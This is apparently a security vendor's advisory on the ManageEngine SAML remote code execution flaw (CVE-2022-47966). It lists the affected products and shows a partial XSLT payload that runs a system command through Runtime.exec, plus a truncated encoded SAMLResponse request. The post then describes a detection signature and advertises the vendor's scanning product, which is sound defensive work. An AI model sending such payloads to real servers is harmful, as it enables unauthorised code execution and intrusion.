top of page
1 min read

Zoho ManageEngine Remote Code Execution (CVE-2022-47966)



Application Details

The following 5 ManageEngine applications are affected; Access Manager Plus v4307, Active Directory 360 v4309, ADAudit Plus v7080, ADManager Plus v7161, and ADSelfService Plus v6210.


Vulnerability

Multiple ManageEngine products could allow a remote attacker to execute arbitrary code on the system, caused by the usage of an outdated third party dependency, Apache Santuario.


Identification

If SAML single sign-on is currently or has been previously enabled, an attacker could send a SAML request with an invalid signature to execute arbitrary code on the system.: 



-----snipped----- 
<xsl:template match="/">
                  <xsl:variable name="rtobject" select="rt:getRuntime()"/>
                  <xsl:variable name="process" select="rt:exec($rtobject,'uid')"/>
                  <xsl:variable name="processString" select="ob:toString($process)"/>
                  <xsl:value-of select="$processString"/>
                </xsl:template>
-----snipped-----

This request is base64 encoded:


POST /SamlResponseServlet

PAYLOAD -
SAMLResponse=JTNDJTNGeG1sK3ZlcnNpb24lM0QlMjIxLjAlMjIrZW5jb2RpbmclM0QlMjJVVEYtOCUyMiUzRiUzRSUwQSUzQ3NhbWxwJTNBUmVzcG9uc2UlMEErK0lEJTNEJTIyX2VkZGMxZTVmLThjODctNGU1NS04MzA5LWM2ZDY5ZDZjMmFkZiUyMiUwQSsrSW5SZXNwb25zZVRvJTNEJTIyXzRiMDVlNDE0YzRmMzdlNDE3ODliNmVmMWJkYWFhOWZmJTIyJTBBKytJc3N1ZUluc3RhbnQlM0QlMjIyMDIzLTAxLTE2VDEzJTNBNTYlM0E0Ni41MTRaJTIyK1ZlcnNpb24lM0QlMjIyLjAlMjIreG1sbnMlM0FzYW1scCUzRCUyMnVybiUzQW9hc2lzJTNBbmFtZXMlM0F0YyUzQVNBTUwlM0EyLjAlM0Fwcm90b2NvbCUyMiUzRSUwQSsrJTNDc2FtbHAlM0FTdGF0dXMlM0UlMEErKysrJTNDc2FtbHAlM0FTdGF0dXNDb2RlK1ZhbHVlJTNEJTIydXJuJTNBb2FzaXMlM0FuYW1lcyUzQXRjJTNBU0FNTCUzQTIuMCUzQXN0YXR1cyUzQVN1Y2Nlc3MlMjIlMkYlM0UlMEErKyUzQyUyRnNhbWxwJTNBU3RhdHVzJTNFJTBBKyslM0NBc3NlcnRpb24rSUQlM0QlMjJfYjVhMmU5YWEtODk1NS00YWM2LTk0ZjUtMzM0MDQ3ODgyNjAwJTIyJTBBKysrK0lzc3VlSW5zdGFudCUzRCUyMjIwMjMtMDEtMTZUMTMlM0E1NiUzQTQ2LjQ5OFolMjIrVmVyc2lvbiUzRCUyMjIuMCUyMit4bWxucyUzRCUyMnVybiUzQW9hc2lzJ
-----snipped-----


Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary code on the system.


Coverage

Idappcom have created signature 8023499 along with a traffic file for this vulnerability.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

Comments

bottom of page